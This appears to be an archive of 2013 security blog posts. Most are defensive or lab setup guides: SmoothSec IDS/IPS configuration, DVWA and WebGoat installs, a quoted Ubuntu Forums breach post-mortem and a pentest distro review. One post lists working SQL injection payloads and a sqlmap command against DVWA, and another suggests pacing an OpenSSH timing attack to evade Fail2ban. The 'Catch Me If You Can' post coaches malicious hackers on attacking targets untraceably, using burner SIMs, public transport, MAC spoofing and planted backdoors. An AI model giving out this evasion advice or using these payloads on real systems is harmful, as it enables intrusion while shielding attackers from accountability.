AF_PACKET is ideal for IDS/IPS implementation when you have a very low-end hardware.

(F) Limitation

Since SmoothSec 3.2 is build on Debian 7.0 (Wheezy), the system will be broken when you upgrade to Sid (Unstable). The newer version of Apache (2.4.x) and Perl will refuse to run due to error. Therefore, when you installed the newer kernel (for AF_PACKET purpose), make sure you comment out the repos that you added in order to prevent the system upgrade to the Sid (Unstable) by accident.

Another limitation is that you are requested to have at least 3 NICs for IDS or IPS.

One more limitation is the Snorby cannot show the dropped traffic at the moment.

Known Issue

Pigsty will crash randomly. As a result, no capture in Snorby. The problem has been reported, see here. --> The workaround is to run a testing bash script on every 5 minutes to start Pigsty again.

nano /root/chkpigstylog

#!/bin/bash
# Check if "Error: " in pigsty.log or not. If yes, start Pigsty again.
STRING="Error: "
if grep -R "$STRING" /var/log/pigsty.log
then
   /root/runpigsty
fi


nano /root/runpigsty

#!/bin/bash
/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i eth0 -n "Suricata" -d /var/log/suricata/ -m unified2.alert.* -D


crontab -e
*/5 * * * * /root/chkpigstylog


Update

Developers just fixed the problem. You just upgrade the Pigsty with the following command :

npm update pigsty-mysql -g
npm update pigsty -g


That's all! See you.

Monday, August 26, 2013

HOWTO : SmoothSec 3.2 (beta) as Intrusion Prevention System (IPS)

I am going to tell you how to build an affortable Intrusion Prevention System (IPS) at home or SOHO or small business. With the default setting of Suricata, the performance of SmoothSec is not too good for watching Youtube (360p) with the following hardware. However, when it is tuned, it can watch the Youtube up to 720p resolution with the following hardware via 10Mb internet connection. Yes, it is still lagging, but you can watch. Please also note that the connection is also behind a router (Untangle with the same motherboard, CPU and RAM).

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

Software

Operating System - SmoothSec 3.2 beta (64-bit). The beta version is no longer exist. Please go to official site for the Version 3.2. The beta and official version are same. The official site is at here.

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Card 0 and 1 will be bridged up while Network Card 2 will be a management interface.

Step 1 :

First of all, SmoothSec (Network Card 2) is connected to the Switch while Network Card 0 and 1 do not connect to the router. It is because you need to connect to the internet for the installation.

Step 2 (IDS Mode) :

Install SmoothSec as usual. When you prompt for install non-free network interface firmware, just ignore it. After installed, the box will be reboot.

Login as "root" with password "toor".

Step 3 (Bug Fix):

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Locate "HOME_NET: '[192.168.1.0/24]'" and change to "HOME_NET: '[192.168.0.0/24]'".

*or your network subnet.

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Set the time zone for "UTC" at "None of the above"; otherwise, the Snorby will reported wrong timestamp.

nano /var/www/snorby/config/snorby_config.yml

Make sure "production:" and "timezone_search: false".

Make sure "time_zone: 'UTC'" is commented.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix libxrender-dev libfontconfig1

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment all about eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where the "address" is your SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asking for monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Then reboot.

Once boot up, go to one of the Personal Computers and browse "https://192.168.0.120". Then set the time zone and your report email address accordingly.

Step 6 (IPS Mode):

Make sure your box is running in IDS mode at least for a day and then perform the following to switch it to IPS mode (inline mode). Otherwise, Snorby cannot capture the traffic.

Suricata

nano /etc/suricata/suricata.yaml

Locate "rule-files:" and append "- local.rules" under "- emerging.rules".

cd /etc/suricata/rules

touch local.rules

* you can add your rules at "local.rules". Once it is added, you need to restart the suricata :

Locate "nfq:" and uncomment all the items at the section but except "# fail-open: yes" as it requires a Linux kernel version 3.6 or greater.


/etc/init.d/suricata restart

* you need to wait for several minutes before the box can be connected to internet.

PulledPork

nano /etc/pulledpork/suricata/dropsid.conf

Append the following :

pcre:MS(0[0-9]|1[0-9]-\d+,bugtraq:\d+,cve:20[0-9][0-9]-\d+

* to drop all the vulnerabilities in vulnerability reports.

IPtables

Add the following lines above "exit 0" at "/etc/rc.local" :

nano /etc/rc.local

iptables -A INPUT -i br0 -j NFQUEUE --queue-balance 0:3
iptables -A OUTPUT -o br0 -j NFQUEUE --queue-balance 0:3
iptables -A FORWARD -i br0 -o br0 -j NFQUEUE --queue-balance 0:3

* note that I have Quard-core CPU. If you have 8-core, "--queue-balance" will be "0:7".

Suricata Startup Script

nano /etc/init.d/suricata

Locate "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -i $INTERFACES -D"

Replace with "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -q0 -q1 -q2 -q3 -D"

Locate "/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i $INTERFACES -n 'Suricata' -d /var/log/suricata/ -m unified2.alert.* -D"

Replace with "/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i br0 -n 'Suricata' -d /var/log/suricata/ -m unified2.alert.* -D"


* make sure you do it twice as there are 2 entries at the file.
** if you have 8-core CPU, it will be "-q0 -q1 -q2 -q3 -q4 -q5 -q6 -q7".

Then reboot your box. Please note that you are required to wait for several minutes before you can connect to the internet.

Step 7:

To update SmoothSec, you need to do the following commands (you can make a script to do so). The rules will be updated automatically in the early morning every day.

apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master
# update Snorby
cd /var/www/snorby
git pull origin master
rake snorby:update
cd ~
# update pigsty
npm update -g pigsty
npm update -g pigsty-mysql
# update Suricata rules
smoothsec.suricata.rules.update


Step 8 (Suricata Tuning) :

nano /etc/suricata/suricata.yaml

Change "max-pending-packets:1024" to "max-pending-packets: 65000".

Locate "detect-engine" and change "- profile: medium" to "- profile: high".

Locate "mpm-algo: ac" and insert "detect-engine.sgh-mpm-context: full" above "mpm-algo: ac".

Then restart the Suricata. Please wait for several minutes before you can connect to the internet.

/etc/init.d/suricata restart

Known Issue

(1) You should remember that your box is in UTC time zone.
(2) You may need to disable the rule (1:2100527), which is for same IP address scanning/connection, at "/etc/pulledpork/suricata/disablesid.conf". After that, make sure you restart the Suricata.
(3) If you use other pattern-matcher, such as b2g, b3g, wumanber, other than ac, you will need more than 4GB RAM.
(4) Using ac as pattern-matcher with 4GB of memory with Intel Atom D510 CPU, you will encounter lagging while watching Youtube (720p resolution) with about 20,000 active rules.
(5) If you have nVidia display card (make sure you have installed nVidia and Cuda drivers), you can compile Suricata with the flag "--enable-cuda --enable-nfqueue" and configure "/etc/suricata/suricata.yaml" with "mpm-algo: b2g_cuda". Please note that you should have more than 4GB of memory. And the setting is similar or same as above.


Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform
Snorby::Jobs::DailyCacheJob.new(true).perform
(this command is invalid for version 2.6.2)

Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
Suricata Performance Tuning
SmoothSec WiKi - for installation

That's all! See you.

Thursday, August 22, 2013

HOWTO : SmoothSec 3.2 (beta) as Intrusion Detection System (IDS)

I am going to tell you how to build an affortable Intrusion Detection System (IDS) at home or SOHO or small business. For building an Intrusion Prevention System (IPS), I will write another article about it later.

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

Software

Operating System - SmoothSec 3.2 beta (64-bit). The beta version is no longer exist. Please go to official site for the Version 3.2. The beta and official version are same. The official site is at here.

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Card 0 and 1 will be bridged up while Network Card 2 will be a management interface.

Step 1 :

First of all, SmoothSec (Network Card 2) is connected to the Switch while Network Card 0 and 1 do not connect to the router. It is because you need to connect to the internet for the installation.

Step 2 :

Install SmoothSec as usual. When you prompt for install non-free network interface firmware, just ignore it. After installed, the box will be reboot.

Login as "root" with password "toor".

Step 3 (Bug Fix):

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Locate "HOME_NET: '[192.168.1.0/24]'" and change to "HOME_NET: '[192.168.0.0/24]'".

*or your network subnet.

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Set the time zone for "UTC" at "None of the above"; otherwise, the Snorby will reported wrong timestamp.

nano /var/www/snorby/config/snorby_config.yml

Make sure "production:" and "timezone_search: false".

Make sure "time_zone: 'UTC'" is commented.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix libxrender-dev libfontconfig1

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment all about eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where the "address" is your SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asking for monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Then reboot.

Once boot up, go to one of the Personal Computers and browse "https://192.168.0.120". Then set the time zone and your report email address accordingly.

Step 6:

To update SmoothSec, you need to do the following commands (you can make a script to do so). The rules will be updated automatically in the early morning every day.

apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master
# update Snorby
cd /var/www/snorby
git pull origin master
rake snorby:update
cd ~
# update pigsty
npm update -g pigsty
npm update -g pigsty-mysql
# update Suricata rules
smoothsec.suricata.rules.update

Known Issue

Nil.

You should remember that your box is in UTC time zone.

Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform
Snorby::Jobs::DailyCacheJob.new(true).perform
(This command is invalid for Snorby version 2.6.2)

Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
SmoothSec WiKi - for installation

That's all! See you.

Thursday, August 15, 2013

Quick Blind TCP Connection Spoofing with SYN Cookies

A various of Linux distributions including Ubuntu and Debian is enabled TCP SYN Cookies defence mechanism against SYN-Flooding DoS Attacks by default.

However, this defence mechanism may led to an attack. Jakob Lell developed a PoC exploit and performed a test. He found out that there is about one successful spoof connection every 10 minutes on a 3 year old notebook (HP 6440b, i5-430M CPU and Marvell 88E8072 gigabit NIC) client and a desktop computer as the server. The test was running 10.5 hour overnight and successfully spoofed 64 connections.

He also stated that if the TCP SYN Cookies is not enabled, the attack may also be successful but it may need more time.

Consider what happen if an attacker spoofed a SSH connection without credentials.

Reference

[1] Full Disclosure
[2] Jakob Lell's Blog

That's all! See you.

Saturday, August 10, 2013

OpenSSH Time Brute Force

In 2006, there is a bug report about OpenSSH time brute forcing. However, the developers of the OpenSSH stated that it is not a bug and they would not fix it.

When an attacker try to brute force OpenSSH account, s/he will issue a very long password (such as 39,000 in length). When the account name exists, the response time will be in very high delay comparing with the non-existing one.

TurboBorland developed a Proof-of-Concept (PoC) code for the purpose.

He stated that he cannot test it successfully in the local network but it work perfectly in internet. However, I did not test it myself. If you are interested in it, you can try.

If the target is implemented Fail2ban, you can try to delay the attack timing in order to avoid from being blocked or banned.

That's all! See you.

Thursday, August 08, 2013

HOWTO : Enable TLS/1.1 on Firefox 23.0

Firefox 23.0 is released. It supports TLS/1.1 but it is not enabled by default. Hiawatha WebServer developer, Hugo Leisink, suggests to enable it. He suggests to set the value of security.tls.version.max to 2.

Since the security.tls.version.min setting of Firefox 23.0 is 0, the security would be fallback to lower encryption protocol when the web server does not support TLS/1.1. So, it is safe to enable it.

How to enable it? Just keyin "about:config" on the url field of Firefox 23.0 and search for "security.tls.version.max". Then set the value 1 to 2.

Meanwhile, Hiawatha WebServer already support TLS/1.1 and she is one of the most lightweight and secured web server by design.

That's all! See you.

Tuesday, August 06, 2013

Anonymity Network (Tor) has been compromised by NSA

Many hidden servers of Tor network are disappeared since this Sunday. The Freedom Hosting (which hosting a lot of hidden services servers) founder has been arrested and charged for managing some Porn sites.

The article tell you something about that. This article believed that the server of Freedom Hosting is compromised by FBI with malicious javascript.

However, Cryptocloud find out that the javascript was planted by National Security Agency (NSA).

It is true that the Tor network can be monitored by NSA.

If you are using Tor network, make sure you are using the latest version of Firefox and Tor software as well as to use NoScript (Firefox addon) to block the javascript and flash. Make sure you are not using outdated Firefox such as Tor Browser Bundle.

Or, you can consider to use my project namely NightHawk with the latest version of Firefox and NoScript.

That's all! See you.

Friday, August 02, 2013

HOWTO : DVWA SQL Injection

Security level = low

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message but display all records

99 or 1=1 union select null,null
- no error message but display all records

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'
- will display the users table column list

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the mysql directory

99 or 1=1 union all select null,load_file('/etc/passwd')
- will display the content of /etc/passwd

Security level = medium

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message but display all records

99 or 1=1 union select null,null
- no error message but display all records

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- since where clause cannot be used, all column name should be listed

or

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273
- where 0x7573657273 is Hex value of "users"

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the mysql directory

sqlmap for Security = low

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

For Security = medium is similar.

That's all! See you!

HOWTO : Install DVWA on Ubuntu Server 12.04 LTS

Step 1 :

Download DVWA.

wget https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip

Step 2 :

Install essential packages if you do not install LAMP when installing the Ubuntu Server.

sudo apt-get install apache2 mysql-server php5 unzip php5-mysql php-pear*

* make sure you remember the root password of MySQL, e.g. dvwapass

Step 3 :

Extract DVWA.

sudo cp v1.0.8.zip /var/www/
unzip v1.0.8.zip


Step 4 :

sudo nano /var/www/DVWA/config/config.inc.php

Change the "db_password" to the captioned root password, e.g. dvwapass.

sudo nano /etc/apache2/conf.d/php.ini

change "allow_url_include = Off" to "allow_url_inclue = On".

sudo chmod -R 777 /var/www/DVWA/hackable/uploads/

Step 5 :

Create Database.

mysql -u root -p
create database dvwa;
quit


Step 6 :

Point your Firefox to "http://192.168.0.10/DVWA/setup.php" to create/reset database.

* where 192.168.0.10 is the IP address of the Ubuntu Server

Step 7 :

Then point your Firefox to "http://192.168.0.10/DVWA/index.php".

User name is "admin" and Password is "password".

That's all! See you.

Wednesday, July 31, 2013

Ubuntu Forums has been pwned! (Part 2)

Ubuntu Forums resumed finally. Congrats! The forum admin, Elfy, posted a message about the attack. I quote here for your reference.

"As announced previously, there was a security breach on the Ubuntu Forums. What follows is a detailed post mortem of the breach and corrective actions taken by the Canonical IS team. In summary, the root cause was a combination of a compromised individual account and the configuration settings in vBulletin, the Forums application software. There was no compromise of Ubuntu itself, or any other Canonical or Ubuntu services. We have repaired and hardened the Ubuntu Forums, and as the problematic settings are the default behaviour in vBulletin, we are working with vBulletin staff to change and/or better document these settings.

== What happened ==

At 16:58 UTC on 14 July 2013, the attacker was able to log in to a moderator account owned by a member of the Ubuntu Community.

This moderator account had permissions to post announcements to the Forums. Announcements in vBulletin, the Forums software, may be allowed to contain unfiltered HTML and do so by default.

The attacker posted an announcement and then sent private messages to three Forum administrators (also members of the Ubuntu community) claiming that there was a server error on the announcement page and asking the Forum administrators to take a look.

One of the Forum administrators quickly looked at the announcement page, saw nothing wrong and replied to the private message from the attacker saying so. 31 seconds after the Forum administrator looked at the announcement page (and before the administrator even had time to reply to the private message), the attacker logged in as that Forum administrator.

Based on the above and conversations with the vBulletin support staff, we believe the attacker added an XSS attack in the announcement they posted which sent the cookies of any visitor to the page to the attacker.

Once the attacker gained administrator access in the Forums they were able to add a hook through the administrator control panel. Hooks in vBulletin are arbitrary PHP code which can be made to run on every page load. The attacker installed a hook allowing them to execute arbitrary PHP passed in a query string argument. They used this mechanism to explore the environment and also to upload and install two widely available PHP shell kits. The attacker used these shell kits to upload and run some custom PHP code to dump the 'user' table to a file on disk which they then downloaded.

The attacker returned on 20 July to upload the defacement page.

== What the attacker could access ==

The attacker had full access to the vBulletin environment as an administrator and shell access as the 'www-data' user on the Forums app servers.

Having administrator access to the vBulletin environment means they were able to read and write to any table in the Forums database.

They used this access to download the 'user' table which contained user names, email addresses and salted and hashed (using MD5) passwords for 1.82 million users.

== What the attacker could not access ==

We believe the attacker was NOT able to escalate past the 'www-data' user (i.e. gain root) access on the Forums app servers.

We believe the attacker was NOT able to escalate past remote SQL access to the Forums database on the Forums database servers.

We believe the attacker did NOT gain any access at all to the Forums front end servers.

We believe the attacker was NOT able to gain any access to any other Canonical or Ubuntu services.

We know the attacker was NOT able to gain access to any Ubuntu code repository or update mechanism.

== What we don't know ==

We don't know how the attacker gained access to the moderator account used to start the attack.

The announcement the attacker posted was deleted by one of the Forum administrators so we don't know exactly what XSS attack was used.

== What we've done ==

Before bringing the Forums back online, we implemented a series of changes both designed to clean up after this attack and also to defend against and mitigate the fallout from possible attacks in the future.

=== Clean up ===

* We sent individual mails to all Forums users informing them of the breach and that they should consider their Forum password compromised. We advised them to change this password on any other systems where they may have re-used it.

* We backed up the servers running vBulletin, and then wiped them clean and rebuilt them from the ground up.

* We randomised all user passwords in the Forums.

* We reset all system and database passwords.

* We manually imported data into a fresh database after sanity checking each table.

=== Hardening ===

* We've removed the ability to modify or add new hooks except via root access to the database

* We've disabled all potential HTML posting avenues in the Forums for everyone but administrators.

* We've switched the Forums to use Ubuntu SSO for user authentication.

* We've implemented automated expiry of inactive moderator and administrator accounts.

* We've confined vBulletin with an AppArmor profile.

* We've reviewed and further hardened the firewalling around the Forums servers.

* We've reviewed and further hardened the PHP config on the server to close off some vectors used by the attacker.

* We've switched to forcing HTTPS for the administrator and moderator control panels and made it optionally available everywhere else

* We've improved escalation procedures for the Ubuntu Community members who graciously volunteer their time to administer and moderate the Forums.

* We will continue to work with vBulletin staff to discuss changes to the default settings which could help others avoid similar scenarios as this. The vBulletin support staff have been helpful and cooperative throughout this incident.

Finally, we'd like once again to apologize for the security breach, the data leak and downtime"


**************

After reading the above message, I think that the Ubuntu Forums is still under a high risk. Why?

It seems that they find out the cause of the attack and the way how the attacker attack. However, it is not.

They still do not know how the attacker gains access to one of the moderator accounts. Attacker gains access by SQLi? Or, by phishing? Who knows! Since the forums has changed the logic for OpenID login when it is upgraded in the early of this year, may be one of the attack vectors is there.

The login method is changed to Ubuntu One SSO. It seems okay. But, what if the Ubuntu One SSO login logic has vulnerability? Or, the attack is not via the login vulnerability?

They limited the HTML code in the forums and it seems good. However, the filters can be spoofed very easily for a skilled attacker. How about the attacker issue javascript?

If the forums still has vulnerability, the attacker can attack the forum admin or moderator accounts directly without escalation of any account.

The implementation of Apparmor is a good idea. However, the forums still can be defaced if the attacker gains the rights as the Apparmor will not block this kind of activities. Attacker can also access the database servers even it is remote.

Altering the PHP config file and enhance the firewall will not do much improvement. Since firewall is handling or controlling the Network Layer but the attack may be targeted to Layer 7 - Application Layer. Meanwhile, PHP config enhancement will not prevent from being attack or gain access to the web application.

In my opinion, I suggest the forum admins consider to do penetration testing on the vBulletin although there is no exploit for vBulletin 4.2.1 in the wild so far. However, who knows there will be some unknown exploits for vBulletin 4.2.1?

As far as I know, most forum admins are still in old school security mindset. They need to learn more and new. Otherwise, the next attack is awaiting. Clients (customers) always losers in the cyber attack.

That's all! See you.

Catch Me If You Can

As a malicious hacker, you are required to hide yourself before attack. If you failed to do so, you will be caught. Most malicious hackers will hide themselves by using botnets, Tor or proxies, or similar. However, I would like to introduce a new way to hide yourself when doing evil things in the internet.

In our country, you are not required to register your personal particulars to purchase 3G/4G pre-paid SIM card. In other countries, you may required to do so.

In the early morning, you can on board a public transportation, such as bus, and pay with non-traceable payment method, such as cash. Open your laptop and plugin your 3G/4G mobile dougle. You are using a pre-paid SIM card and you are on a moving public transportation as well as paid by non-traceable payment method. You fake your MAC address with macchanger.

You search for a target in the Google with dorks. Once you find a target, you can go ahead to attack it without worrying about to hide yourself. After several commands issued, you get a shell and compromised the target. You leave a backdoor for further access.

After that, you make sure to drop the pre-paid SIM card to the rubbish bin that out of your living area after your successful attack.

Next time, you take another route of the public transportation to access the compromised target or to seek another target with another pre-paid SIM card.

Now, you are fully untraceable.

That's all! See you.

See Also

Catch Me If You Can 2
Catch Me If You Can 3
Catch Me If You Can 4

NATO Review - Cyber Attacks

The followings are the NATO Review for Cyber Attacks recently.

Cyber attacks : How can they hurt us?



Cyberwar - does it exist?



Cyber Attacks and Angry Birds



Hackers for hire



That's all! See you.

Saturday, July 27, 2013

HOWTO : WebGoat 5.4 on Ubuntu Server 12.04 LTS

Step 1 :

Install Ubuntu Server 12.04 LTS as usual. Select OpenSSH server and Tomcat Server at the end of the installer.

Step 2 :

Download the WebGoat 5.4.

wget http://webgoat.googlecode.com/files/WebGoat-5.4.war

Step 3 :

Copy the WebGoat.war to the Tomcat directory.

mv WebGoat-5.4.war WebGoat.war
sudo cp WebGoat.war /var/lib/tomcat6/webapps/


Step 4 :

Edit the tomcat-users.xml for the WebGoat 5.4.

sudo nano /etc/tomcat6/tomcat-users.xml

Insert the following before </tomcat-users> tag :

<role rolename="webgoat_basic"/>
<role rolename="webgoat_admin"/>
<role rolename="webgoat_user"/>
<role rolename="tomcat"/>
<user password="webgoat" roles="webgoat_admin" username="webgoat"/>
<user password="basic" roles="webgoat_user,webgoat_basic" username="basic"/>
<user password="tomcat" roles="tomcat" username="tomcat"/>
<user password="guest" roles="webgoat_user" username="guest"/>


Step 5 :

Restart Tomcat.

sudo /etc/init.d/tomcat6 restart

Step 6 :

Open a browser (e.g. Firefox) and point to the WebGoat (e.g. 192.168.56.102).

http://192.168.56.102:8080/WebGoat/attack

Enter the username and password for both as "guest".

Tutorial

OWASP WebGoat v5.4 Web Hacking Simulation WalkThrough Series

That's all! See you.

Sunday, July 21, 2013

Ubuntu Forums has been pwned!

According to the Ubuntu Forums, the forums has been defaced at 2011 hours on July 20, 2013 (UTC). The defacement page is same as this and the source code of the page is here. It also plays a music too.

Ubuntu Forums also stated that the website's database has been downloaded by attacker and it is also confirmed by the attacker. However, the attacker stated that s/he will not leak the database to the public or take advantage of it.

The Ubuntu Forums use vBulletin PHP software. The forums has been updated or upgraded in the early of this year. According to Exploit Database that the latest exploit is dated on March 25, 2013 (not talking about the exploit in July, 2013 as it is already updated/upgraded). If the update/upgrade is included these bugs fix, there would be no known exploit for the vBulletin in the wild.

However, the forums has looked for PHP developers to assist to implement the OpenID for the forums update/upgrade on January 23, 2012 (please see here).

If the custom changed vBulletin do not have audit or penetration test, it may contain bugs or vulnerabilities. The custom change of vBulletin may lead to the attack success.

I think that the attack technique in this case is SQL Injection.

The forums is still down at the time of this writing (July 21, 2013 1340 UTC).

Remark : please refer to this link for my information gathering.

That's all! See you.

UPDATE : Part 2

Friday, July 19, 2013

Coming Soon : Bugtroid

Bugtraq for Android is coming soon. It is not running in virtualization technology.



That's all! See you.

HOWTO : Update Vega on Bugtraq 2 Black Widow

When you run Vega Webscanner, you will find a pop up for the update. I am going to tell you how to update yourself instead via the official Hammer System Manager of Bugtraq 2.

Be keep in mind that you are not required to use "sudo".

Download the latest version - 1.0 build 96.

32-bit :

wget http://subgraph.com/downloads/VegaBuild-linux.gtk.x86.zip

64-bit :

wget http://subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip

Extract the zip file :

unzip VegaBuild-linux.gtk.x86.zip

or

unzip VegaBuild-linux.gtk.x86_64.zip

Backup the current Vega :

mv /bugtraq/tools/web_audit/web_analisys/vega /bugtraq/tools/web_audit/web_analisys/vega-bak

Copy the extracted directory to the destination :

cp -R vega/ /bugtraq/tools/web_audit/web_analisys/

That's all! See you.

Thursday, July 18, 2013

Bug Fix : Bugtraq 2 XFce 64-bit with Paralles Tools on Mac OS X 10.8.4

You need to do the following at the guest (Bugtraq 2 XFce 64-bit) on Paralles 8 before installing the Paralles Tools.

sudo ln -s /usr/lib/insserv/insserv /sbin/insserv

Otherwise, the Paralles Tools cannot be installed properly.

That's all! See you.

Tuesday, July 16, 2013

REVIEW : Bugtraq 2 Black Widow Final

Bugtraq 2 Black Widow Final builds on Ubuntu, Debian and OpenSuse. Each distribution comes with XFce, Gnome and KDE Window Manager. They all also come with 32-bit and 64-bit. A total of 18 copies that the Bugtraq Team needs to maintain.

Bugtraq 2 Black Widow pre-installed and configured some useful Penetration Testing tools that others Pentesting Linux distributions lack of. It also includes smartphone pentesting tools. It will be sweet if Bugtraq 2 can pre-installed Immunity Debugger and edb-debugger as well as T50 and mona.py.

The Conky displays a lot of useful information on the screen that most hackers will think fit. However, the Conky script is designed for 4-core (or 2-core with Hyper-threading). If you have 2-core, you need to change the /bugtraq/scripts/conky/conky-app.sh. Replace "conky -c /bugtraq/scripts/conky/.conkyrc &" with "conky -c /bugtraq/scripts/conky/.conkyrc2 &". Otherwise, the Conky will not loaded.

Bugtraq 2 is also lack of documentation like others. However, you can find a lot of demo video at her official site. There are some interesting demo video, such as bonet setting.

Bugtraq 2 is working well on virtual machine, such as VirtualBox and Parallels (Mac OSX). I tested on Lenovo ThinkPad X201s and find no problem with Ubuntu XFce and Gnome versions.

Bugtraq Team comes from Spain and the Bugtraq 2 Black Widow is default to Spain language and Spain keyboard layout. When you install Bugtraq 2 Black Widow, you need to set the language to English and keyboard layout to "English (US)" or your country setting. The default username is "bugtraq" and password is "123456". Make sure you set your password after install.

I tested Ubuntu Gnome and XFce copies and find that XFce version has lesser bugs. I think that the team is developed from Ubuntu XFce and then build for others based on it. Therefore, I suggest you to download Ubuntu XFce version.

Bugtraq 2 Black Widow comes with Services Administrator GUI and Databases GUI as well as Conky Manager. However, there are some bugs on those programs. The 2 GUI are situated at "Applications -- System Services".

I prepared an auto-run script to fix the bugs on those programs and you can download it at here. it works well on 32-bit and 64-bit Ubuntu Gnome and XFce version. Others not tested but it may works.

The bugfix script is intended to fix the bugs on the Sagui and DBgui. However, it also fix some minor bugs on Conky. Be keep in mind that the official Conky is written for wireless device (wlan0) while my bugfix script is also written for wlan0. If you are using ethernet device, you need to change the "wlan0" to "eth0" (or any device that fits) on the "+.conkyrc" and "proxys.conf" scripts in the "bugtraq-2-gnome-x32-bugix" directory. Make sure you change it before running the bugfix script. In addition, the script will install some missing packages too.

Extract it with the following command :

tar -xvzf bugtraq-2-gnome-x32-bugfix.tar.gz

To run it :

cd bugtraq-2-gnome-x32-bugfix
./auto-bugfix.sh


In addition, there are some bugs on Hammer System Manager and it requires the team to fix.

After the install, you need to update your box. You can do that with the following commands. Or, you can build a script for that too.

sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get --purge autoclean
sudo apt-get --purge auto remove


Conclusion

Highly recommended. Bugtraq 2 Black Widow will give you a new user experience. You will love it. Believe me!

UPDATE

The auto-run script has been updated for minor bug fix on Conky script, you can download at here



That's all! See you.

Monday, July 15, 2013

